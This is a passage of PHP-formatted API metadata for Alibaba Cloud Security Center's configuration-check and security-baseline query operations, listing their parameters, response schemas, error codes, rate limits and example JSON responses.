permissions | medium | ECS | Checks whether SSH key pair-based logon is enabled for ECS instances. |'."\n" .'| 21 | SLB - health status | 5: monitoring and alerting | low | SLB | Checks the health status of SLB instances. |'."\n" .'| 22 | PolarDB - whitelist configurations | 2: network access control | medium | PolarDB | Checks whether a whitelist of a PolarDB cluster contains the CIDR block 0.0.0.0/0. If the whitelist contains the CIDR block, all IP addresses are allowed to access the PolarDB cluster. For security purposes, we recommend that you configure whitelists to allow access from only specified IP addresses. |'."\n" .'| 23 | AnalyticDB for PostgreSQL - whitelist configurations | 2: network access control | medium | PostgreSQL | Checks whether a whitelist of an AnalyticDB for PostgreSQL instance contains the CIDR block 0.0.0.0/0. If the whitelist contains the CIDR block, all IP addresses are allowed to access the AnalyticDB for PostgreSQL instance. For security purposes, we recommend that you configure whitelists to allow access from only specified IP addresses. |'."\n" .'| 24 | ECS - storage encryption | 4: data security | low | ECS | Checks whether disk encryption is enabled. Disk encryption allows you to meet security or regulatory compliance requirements. |'."\n" .'| 25 | SLB - whitelist configurations | 2: network access control | medium | SLB | Checks the whitelist configurations of SLB instances. We recommend that you configure whitelists for non-HTTP and non-HTTPS services. We recommend that you do not add 0.0.0.0/0 to the whitelists. |'."\n" .'| 26 | SLB - certificate validity checks | 5: monitoring and alerting | medium | SLB | Checks whether an SLB certificate has expired. |'."\n" .'| 27 | ECS - automatic snapshot policies | 4: data security | medium | ECS | Checks whether automatic snapshot policies are enabled for ECS instances. |'."\n" .'| 28 | Certificate Management Service - validity checks | 4: data security | medium | SSL | Checks whether an SSL certificate is within its validity period. |'."\n" .'| 30 | OSS - bucket server-side encryption | 4: data security | low | OSS | Checks whether server-side encryption is enabled for OSS buckets. |'."\n" .'| 31 | OSS - bucket hotlink protection | 2: network access control | low | OSS | Checks whether hotlink protection is configured for OSS buckets. |'."\n" .'| 32 | ApsaraDB RDS - cross-region backup configurations | 4: data security | low | RDS | Checks whether cross-region backup is configured for ApsaraDB RDS instances. |'."\n" .'| 33 | ApsaraDB for MongoDB - backup configurations | 4: data security | medium | MongoDB | Checks whether data backup is enabled for ApsaraDB for MongoDB instances. |'."\n" .'| 34 | ApsaraDB for MongoDB - log audit | 3: log audit | medium | MongoDB | Checks whether log audit is enabled for ApsaraDB for MongoDB instances. |'."\n" .'| 35 | ApsaraDB for MongoDB - SSL encryption | 4: data security | medium | MongoDB | Checks whether SSL certificate checks are enabled for ApsaraDB for MongoDB instances. |'."\n" .'| 36 | CloudMonitor - agent status | 5: monitoring and alerting | medium | CloudMonitor | Checks whether the status of the CloudMonitor agent is normal. |'."\n" .'| 37 | ECS - security group policies | 2: network access control | medium | ECS | Checks the security group policies of ECS instances. |'."\n" .'| 38 | VPC - DNAT management port mapping | 2: network access control | medium | VPC | Checks whether a virtual private cloud (VPC) destination network address translation (DNAT) rule is configured to map management ports to the Internet. |'."\n" .'| 39 | ApsaraDB for Redis - backup configurations | 4: data security | medium | Redis | Checks whether data backup is enabled for ApsaraDB for Redis instances. |'."\n" .'| 40 | Container Registry - repository permission configurations | 4: data security | high | CR | Checks whether repository permissions are correctly configured in Container Registry. |'."\n" .'| 41 | Container Registry - security scans | 6: basic security protection | low | CR | Checks whether security scan is enabled in Container Registry. |'."\n" .'| 42 | SLB - logging | 3: log audit | medium | SLB | Checks whether access logging is configured for SLB instances. |'."\n" .'| 43 | ApsaraDB for Redis - log audit | 3: log audit | low | Redis | Checks whether log audit is configured for ApsaraDB for Redis instances. |'."\n" .'| 44 | OSS - authorization policies | 1: identity authentication and permissions | medium | OSS | Checks whether authorization policies are correctly configured in OSS. |'."\n" .'| 46 | PolarDB - backup configurations | 4: data security | medium | PolarDB | Checks whether data backup is enabled for PolarDB clusters. |'."\n" .'| 47 | PolarDB - SQL Explorer | 3: log audit | medium | PolarDB | Checks whether SQL Explorer is enabled for PolarDB clusters. |'."\n" .'| 49 | Alibaba Cloud account security - AccessKey pair | 1: identity authentication and permissions | medium | RAM | Checks whether the AccessKey pair of your Alibaba Cloud account is enabled. |'."\n" .'| 51 | Alibaba Cloud CDN - real-time log push feature | 3: log audit | medium | CDN | Checks whether real-time log push is enabled in Alibaba Cloud CDN. |'."\n" .'| 52 | ApsaraDB for Redis - SSL encryption | 4: data security | medium | Redis | Checks whether SSL certificates are used for ApsaraDB for Redis instances. |', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeRiskCheckResult'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeRiskCheckResult', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'DescribeRiskCheckSummary' => [ 'summary' => 'Queries the summary of cloud service configuration check results, including the number of risk items, risk rate, number of affected assets, check time, and statistics by type.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => true, 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The IP address of the access source that you want to query.', 'type' => 'string', 'required' => false, 'example' => '1.2.XX.XX', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the request and response. Default value: **zh**. Valid values:'."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'ResourceDirectoryAccountId', 'in' => 'query', 'schema' => ['description' => 'The Alibaba Cloud account ID of the member account in the resource directory for multi-account security management.', 'type' => 'string', 'required' => false, 'example' => '1232428423234****', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'description' => 'The response parameters.', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use it to troubleshoot issues.', 'type' => 'string', 'example' => '291B49F9-1685-4005-9D34-606B6F78740F', 'title' => ''], 'RiskCheckSummary' => [ 'description' => 'The statistics of cloud service configuration check results.', 'type' => 'object', 'properties' => [ 'ItemCount' => ['description' => 'The number of check items.', 'type' => 'integer', 'format' => 'int32', 'example' => '4', 'title' => ''], 'AffectedAssetCount' => ['description' => 'The number of assets affected by risk items in the check results.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'DisabledRiskCount' => ['description' => 'The number of check items that failed the check.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'RiskCount' => ['description' => 'The number of detected risk items.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'RiskRate' => ['description' => 'The percentage of detected risk items in the total number of check items.', 'type' => 'number', 'format' => 'float', 'example' => '0.25', 'title' => ''], 'PreviousCount' => ['description' => 'The number of risk items detected in the previous check.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'PreviousTime' => ['description' => 'The timestamp of the previous check. Unit: milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1545012926000', 'title' => ''], 'EnabledRiskCount' => ['description' => 'The number of check items that passed the check.', 'type' => 'integer', 'format' => 'int32', 'example' => '3', 'title' => ''], 'RiskLevelCount' => [ 'description' => 'The list of check item counts by risk level.', 'type' => 'array', 'items' => [ 'description' => 'The count of check items for each risk level.', 'type' => 'object', 'properties' => [ 'Key' => ['description' => 'The risk level of the check item. Valid values:'."\n" .'- **high**: high risk'."\n" .'- **medium**: medium risk'."\n" .'- **low**: low risk.', 'type' => 'string', 'example' => 'medium', 'title' => ''], 'Count' => ['description' => 'The number of check items at the specified risk level.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'Groups' => [ 'description' => 'The statistics information list by check item type.', 'type' => 'array', 'items' => [ 'description' => 'The statistics information of a check item type.', 'type' => 'object', 'properties' => [ 'RemainingTime' => ['description' => 'The estimated check time.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'Status' => ['description' => 'The check status. Valid values:'."\n" ."\n" .'- **finish**: The check is complete.'."\n" ."\n" .'- **running**: The check is in progress.'."\n" ."\n" .'- **waiting**: The check is waiting.'."\n" ."\n" .'- **notStart**: The check has not started.', 'type' => 'string', 'example' => 'finish', 'title' => ''], 'Sort' => ['description' => 'The sort order of the check item type in the **All Types** drop-down list in the console.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'Title' => ['description' => 'The name of the check item category.', 'type' => 'string', 'example' => '身份认证及权限', 'title' => ''], 'Id' => ['description' => 'The ID of the check item category.', 'type' => 'integer', 'format' => 'int64', 'example' => '1', 'title' => ''], 'CountByStatus' => [ 'description' => 'The list of check item result statistics.', 'type' => 'array', 'items' => [ 'description' => 'The check item result statistics.', 'type' => 'object', 'properties' => [ 'Status' => ['description' => 'The status of the check item after the check is complete. Valid values:'."\n" ."\n" .'- **pass**: The check item passed the check, which indicates that the check item is normal.'."\n" ."\n" .'- **failed**: The check item failed the check, which indicates that the check item has risks.', 'type' => 'string', 'example' => 'pass', 'title' => ''], 'Count' => ['description' => 'The number of detected risk items.', 'type' => 'integer', 'format' => 'int32', 'example' => '2', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'no permission', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query cloud service configuration check result summary', 'description' => 'This operation is deprecated. Use the GetCheckSummary operation instead.', 'requestParamsDescription' => ' ', 'responseParamsDescription' => ' ', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeRiskCheckSummary'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeRiskCheckSummary', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"291B49F9-1685-4005-9D34-606B6F78740F\\",\\n \\"RiskCheckSummary\\": {\\n \\"ItemCount\\": 4,\\n \\"AffectedAssetCount\\": 0,\\n \\"DisabledRiskCount\\": 0,\\n \\"RiskCount\\": 1,\\n \\"RiskRate\\": 0.25,\\n \\"PreviousCount\\": 0,\\n \\"PreviousTime\\": 1545012926000,\\n \\"EnabledRiskCount\\": 3,\\n \\"RiskLevelCount\\": [\\n {\\n \\"Key\\": \\"medium\\",\\n \\"Count\\": 1\\n }\\n ],\\n \\"Groups\\": [\\n {\\n \\"RemainingTime\\": 0,\\n \\"Status\\": \\"finish\\",\\n \\"Sort\\": 1,\\n \\"Title\\": \\"身份认证及权限\\",\\n \\"Id\\": 1,\\n \\"CountByStatus\\": [\\n {\\n \\"Status\\": \\"pass\\",\\n \\"Count\\": 2\\n }\\n ]\\n }\\n ]\\n }\\n}","type":"json"}]', ], 'DescribeRiskItemType' => [ 'summary' => 'Queries the types of all cloud service configuration check items.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => true, 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The source IP address of the request.', 'type' => 'string', 'required' => false, 'example' => '183.237.XX.XX', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the request and response. Default value: **zh**. Valid values:'."\n" ."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID. It is a unique identifier generated by Alibaba Cloud for the request and can be used to troubleshoot issues.', 'type' => 'string', 'example' => '3B3F3A90-46A5-4023-A2D8-D68B14262F96', 'title' => ''], 'List' => [ 'description' => 'The collection of cloud service configuration check item types.', 'type' => 'array', 'items' => [ 'description' => 'The cloud service configuration check item type information.', 'type' => 'object', 'properties' => [ 'Id' => ['description' => 'The ID of the cloud service configuration check item.', 'type' => 'integer', 'format' => 'int64', 'example' => '37625', 'title' => ''], 'Title' => ['description' => 'The name of the check type.', 'type' => 'string', 'example' => '身份认证及权限', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query the types of all cloud service configuration check items', 'description' => 'This operation is offline. Use the upgraded operation ListCheckStandard instead.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeRiskItemType'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeRiskItemType', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"3B3F3A90-46A5-4023-A2D8-D68B14262F96\\",\\n \\"List\\": [\\n {\\n \\"Id\\": 37625,\\n \\"Title\\": \\"身份认证及权限\\"\\n }\\n ]\\n}","type":"json"}]', ], 'DescribeRiskListCheckResult' => [ 'summary' => 'Queries the number of risk items detected in the configuration assessment of one or more cloud services by using the instance IDs of the cloud services.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => true, 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The source IP address of the request.'."\n", 'type' => 'string', 'required' => false, 'example' => '59.57.XX.XX', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the content within the request and response. Valid values:'."\n" ."\n" .'* **zh**: Chinese'."\n" .'* **en**: English'."\n", 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The number of the page to return. Pages start from page 1. Default value: 1.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The number of entries to return on each page.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '10', 'title' => ''], ], [ 'name' => 'InstanceIds', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The instance IDs of the cloud services that you want to query. Separate multiple IDs with commas (,).'."\n" ."\n" .'> If you do not specify this parameter, an empty list is returned.'."\n", 'type' => 'array', 'items' => ['description' => 'The instance IDs of the cloud services that you want to query. Separate multiple IDs with commas (,).'."\n" ."\n" .'> If you do not specify this parameter, an empty list is returned.'."\n", 'type' => 'string', 'required' => false, 'example' => 'rm-bp1e8t4q15sr3****', 'title' => ''], 'required' => false, 'maxItems' => 10000, 'title' => '', 'example' => '', ], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => '3BFB4989-A108-46A4-954E-FF7EF02D1078', 'title' => ''], 'List' => [ 'description' => 'The number of risk items for each cloud service.'."\n", 'type' => 'array', 'items' => [ 'description' => 'The number of risk items.'."\n", 'type' => 'object', 'properties' => [ 'riskCount' => ['description' => 'The total number of risk items detected in the current cloud service.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '3', 'title' => ''], 'InstanceId' => ['description' => 'The instance ID of the cloud service.'."\n", 'type' => 'string', 'example' => 'rm-bp1e8t4q15sr3****', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"3BFB4989-A108-46A4-954E-FF7EF02D1078\\",\\n \\"List\\": [\\n {\\n \\"riskCount\\": 3,\\n \\"InstanceId\\": \\"rm-bp1e8t4q15sr3****\\"\\n }\\n ]\\n}","type":"json"}]', 'title' => 'DescribeRiskListCheckResult', 'description' => 'This operation is phased out. You can use the ListCheckResult operation. When you call the ListCheckResult operation, set the Statuses parameter to NOT_PASS.'."\n", 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeRiskListCheckResult'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeRiskListCheckResult', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'DescribeRiskType' => [ 'summary' => 'Queries baseline types.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'abilityTreeCode' => '92179', 'abilityTreeNodes' => ['FEATUREsas0XJWFD'], ], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The source IP address of the request.'."\n", 'type' => 'string', 'required' => false, 'example' => '192.168.X.X', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the content within the request and response. Default value: **zh**. Valid values:'."\n" ."\n" .'* **zh**: Chinese'."\n" .'* **en**: English'."\n", 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'Source', 'in' => 'query', 'schema' => ['description' => 'The data source. Valid values:'."\n" ."\n" .'* **default**: host baseline'."\n" .'* **agentless**: agentless baseline'."\n", 'type' => 'string', 'required' => false, 'example' => 'agentless', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => 'F22037B5-FCE4-5178-A9E7-71798E1F9270', 'title' => ''], 'RiskTypes' => [ 'description' => 'An array that consists of the information about baseline types.'."\n", 'type' => 'array', 'items' => [ 'description' => 'The information about the baseline type.'."\n", 'type' => 'object', 'properties' => [ 'TypeName' => ['description' => 'The name of the baseline type.'."\n", 'type' => 'string', 'example' => 'hc_exploit', 'title' => ''], 'Alias' => ['description' => 'The alias of the baseline type.'."\n", 'type' => 'string', 'example' => 'Redis unauthorized access high exploit vulnerability risk', 'title' => ''], 'SubTypes' => [ 'description' => 'An array that consists of the information about baseline subtypes.'."\n", 'type' => 'array', 'items' => [ 'description' => '', 'type' => 'object', 'properties' => [ 'TypeName' => ['description' => 'The name of the baseline subtype.'."\n", 'type' => 'string', 'example' => 'hc_exploit_redis', 'title' => ''], 'Alias' => ['description' => 'The alias of the baseline subtype.'."\n", 'type' => 'string', 'example' => 'Redis unauthorized access high exploit vulnerability risk', 'title' => ''], 'CheckDetails' => [ 'description' => 'An array that consists of the check details about the baseline subtype.'."\n", 'type' => 'array', 'items' => [ 'description' => '', 'type' => 'object', 'properties' => [ 'CheckId' => ['description' => 'The ID of the baseline.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '1299', 'title' => ''], 'CheckItem' => ['description' => 'The baseline.'."\n", 'type' => 'string', 'example' => 'Ensure password expiration period is set.', 'title' => ''], 'CheckDesc' => ['description' => 'The description of the baseline.'."\n", 'type' => 'string', 'example' => 'Set password expiration time, force regular modification of password, reduce password leakage and guess risk.Use non-password login (e.g. key pair) please ignore this item.', 'title' => ''], 'Rules' => [ 'description' => 'An array that consists of the rule details about the baseline.'."\n", 'type' => 'array', 'items' => [ 'description' => '', 'type' => 'object', 'properties' => [ 'Optional' => ['description' => 'Indicates whether the baseline can be edited. Valid values:'."\n" ."\n" .'* **0**: no'."\n" .'* **1**: yes'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'RuleDesc' => ['description' => 'The description of the rule for the baseline.'."\n", 'type' => 'string', 'example' => 'Please customize the password expiration time detection standard as', 'title' => ''], 'RuleId' => ['description' => 'The ID of the rule for the baseline.'."\n", 'type' => 'string', 'example' => 'audit.audit_policy.auditpolicychange.cus', 'title' => ''], 'ParamList' => [ 'description' => 'An array that consists of the parameters in the rule for the baseline.'."\n", 'type' => 'array', 'items' => [ 'description' => '', 'type' => 'object', 'properties' => [ 'ParamDefaultValue' => ['description' => 'The default value of the parameter.'."\n", 'type' => 'string', 'example' => '7', 'title' => ''], 'ParamName' => ['description' => 'The name of the parameter.'."\n", 'type' => 'string', 'example' => 'range_val', 'title' => ''], 'MaxValue' => ['description' => 'The maximum value of the parameter.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '999', 'title' => ''], 'ParamType' => ['description' => 'The configuration type of the parameter. Valid values:'."\n" ."\n" .'* **1**: input'."\n" .'* **2**: selection'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'ParamDesc' => ['description' => 'The description of the parameter.'."\n", 'type' => 'string', 'example' => 'The setting value is 0 means no definition, 1 means success, 2 means failure, 3 means success and failure', 'title' => ''], 'MinValue' => ['description' => 'The minimum value of the parameter.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'EnumValue' => ['description' => 'If the value of paramType is 1, this parameter is empty. If the value of paramType is 2, this parameter provides the options that can be selected for paramType.'."\n", 'type' => 'string', 'example' => '0,1,2,3', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'SupportedOs' => [ 'description' => 'The operating system type of the server. Valid values:'."\n" ."\n" .'- **windows**'."\n" .'- **linux**', 'type' => 'string', 'enumValueTitles' => [], 'example' => 'linux', 'title' => '', ], 'AuthFlag' => [ 'description' => 'The baseline subtype permission flag of the current user version. Valid values:'."\n" ."\n" .'- **true**: Have access'."\n" .'- **false**: No permissions', 'type' => 'boolean', 'enumValueTitles' => [], 'example' => 'true', 'title' => '', ], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'AuthFlag' => [ 'description' => 'The baseline type flag of the current user version. Valid values:'."\n" ."\n" .'- **true**: Have access'."\n" .'- **false**: No permissions', 'type' => 'boolean', 'enumValueTitles' => [], 'example' => 'true', 'title' => '', ], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => 'The returned data.', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => '-101', 'errorMessage' => '%s %s', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => '-100', 'errorMessage' => 'The service is unavailable, please try again later.', 'description' => ''], ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"F22037B5-FCE4-5178-A9E7-71798E1F9270\\",\\n \\"RiskTypes\\": [\\n {\\n \\"TypeName\\": \\"hc_exploit\\",\\n \\"Alias\\": \\"Redis unauthorized access high exploit vulnerability risk\\",\\n \\"SubTypes\\": [\\n {\\n \\"TypeName\\": \\"hc_exploit_redis\\",\\n \\"Alias\\": \\"Redis unauthorized access high exploit vulnerability risk\\",\\n \\"CheckDetails\\": [\\n {\\n \\"CheckId\\": 1299,\\n \\"CheckItem\\": \\"Ensure password expiration period is set.\\",\\n \\"CheckDesc\\": \\"Set password expiration time, force regular modification of password, reduce password leakage and guess risk.Use non-password login (e.g. key pair) please ignore this item.\\",\\n \\"Rules\\": [\\n {\\n \\"Optional\\": 1,\\n \\"RuleDesc\\": \\"Please customize the password expiration time detection standard as\\",\\n \\"RuleId\\": \\"audit.audit_policy.auditpolicychange.cus\\",\\n \\"ParamList\\": [\\n {\\n \\"ParamDefaultValue\\": \\"7\\",\\n \\"ParamName\\": \\"range_val\\",\\n \\"MaxValue\\": 999,\\n \\"ParamType\\": 1,\\n \\"ParamDesc\\": \\"The setting value is 0 means no definition, 1 means success, 2 means failure, 3 means success and failure\\",\\n \\"MinValue\\": 1,\\n \\"EnumValue\\": \\"0,1,2,3\\"\\n }\\n ]\\n }\\n ]\\n }\\n ],\\n \\"SupportedOs\\": \\"linux\\",\\n \\"AuthFlag\\": true\\n }\\n ],\\n \\"AuthFlag\\": true\\n }\\n ]\\n}","type":"json"}]', 'title' => 'DescribeRiskType', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeRiskType'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeRiskType', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'DescribeRisks' => [ 'summary' => 'Queries baseline details by baseline ID or name.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'RiskId', 'in' => 'query', 'schema' => ['description' => 'The ID of the baseline.'."\n" ."\n" .'> You can call the [DescribeCheckWarningSummary](~~DescribeCheckWarningSummary~~) operation to obtain the baseline ID.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '75', 'title' => ''], ], [ 'name' => 'RiskName', 'in' => 'query', 'schema' => ['description' => 'The name of the baseline.', 'type' => 'string', 'required' => false, 'example' => 'docker', 'title' => ''], ], [ 'name' => 'Limit', 'in' => 'query', 'schema' => ['description' => 'The maximum number of baselines to return. Default value: 20.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '10', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the request and response. Valid values: '."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'ResourceDirectoryAccountId', 'in' => 'query', 'schema' => ['description' => 'The Alibaba Cloud account ID of the member accounts in the resource folder.'."\n" .'>You can invoke the [DescribeMonitorAccounts](~~DescribeMonitorAccounts~~) operation to obtain this parameter.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '127608589417****', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'The baseline list result.', 'type' => 'object', 'properties' => [ 'Risks' => [ 'description' => 'The baseline list.', 'type' => 'array', 'items' => [ 'description' => 'The baseline details.', 'type' => 'object', 'properties' => [ 'RiskId' => ['description' => 'The baseline ID.', 'type' => 'integer', 'format' => 'int64', 'example' => '54', 'title' => ''], 'RiskName' => ['description' => 'The name of the baseline.', 'type' => 'string', 'example' => 'Alibaba Cloud Standard - Ubuntu Security Baseline', 'title' => ''], 'RiskDetail' => ['description' => 'The detailed description of the baseline.', 'type' => 'string', 'example' => 'Ubuntu 14, Ubuntu 16, Ubuntu 18, Ubuntu 20 baseline based on Alibaba Cloud best security practices', 'title' => ''], 'RiskType' => ['description' => 'The baseline category name.', 'type' => 'string', 'example' => 'cis', 'title' => ''], 'TypeAlias' => ['description' => 'The display name of the baseline category.', 'type' => 'string', 'example' => 'Best security practices', 'title' => ''], 'SubRiskType' => ['description' => 'The baseline subcategory.', 'type' => 'string', 'example' => 'hc_ubuntu', 'title' => ''], 'SubTypeAlias' => ['description' => 'The display name of the baseline subcategory.', 'type' => 'string', 'example' => 'Alibaba Cloud Standard - Ubuntu Security Baseline', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'TotalCount' => ['description' => 'The total number of baselines returned.', 'type' => 'integer', 'format' => 'int32', 'example' => '23', 'title' => ''], 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. 